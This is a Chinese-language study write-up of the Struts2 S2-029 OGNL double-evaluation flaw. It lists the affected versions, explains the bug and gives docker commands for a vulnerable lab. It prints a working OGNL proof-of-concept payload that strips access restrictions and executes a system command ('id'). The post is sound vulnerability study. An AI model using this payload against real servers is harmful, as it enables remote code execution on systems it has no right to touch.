Struts –s2-29

此文仅供大家交流学习，严禁非法使用

一、参考网址：

http://blog.topsec.com.cn/ad_lab/struts2%E6%BC%8F%E6%B4%9Es2-029%E5%88%86%E6%9E%90/

二、 影响版本：

Struts 2.0.0 - Struts 2.3.24.1（2.3.20.3除外）

三、 漏洞介绍：

Struts框架被强制执行时，对分配给某些标签的属性值进行双重评估，因此可以传入一个值，当一个标签的属性将被渲染时，该值将被再次评估。

漏洞理解：
代码执行过程大致为先尝试获取value的值，如果value为空，那么就二次解释执行了name。并且在执行前给name加上了”%{}”。最终造成二次执行。因此需要的条件极为苛刻，特殊的代码，value值为空，可以传参到value，控制name，严格来说应该是个本地漏洞。。

四、 环境搭建：

参考上面网址在linux搭建docker环境，感觉该作者精心做的可以远程代码执行的环境

• 拉取镜像到本地

$ docker pull medicean/vulapps:s_struts2_s2-029

• 启动环境

$ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029

五、 POC:

(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()))

六、 漏洞利用：

1.png

七、 至此，该漏洞基本利用完毕

本人还是一个未毕业的小萌新，希望大家多多帮助，有问题请发送邮件到xrzsupupup@163.com不胜感激，我也会尽量去帮助大家

坚决做一名白帽子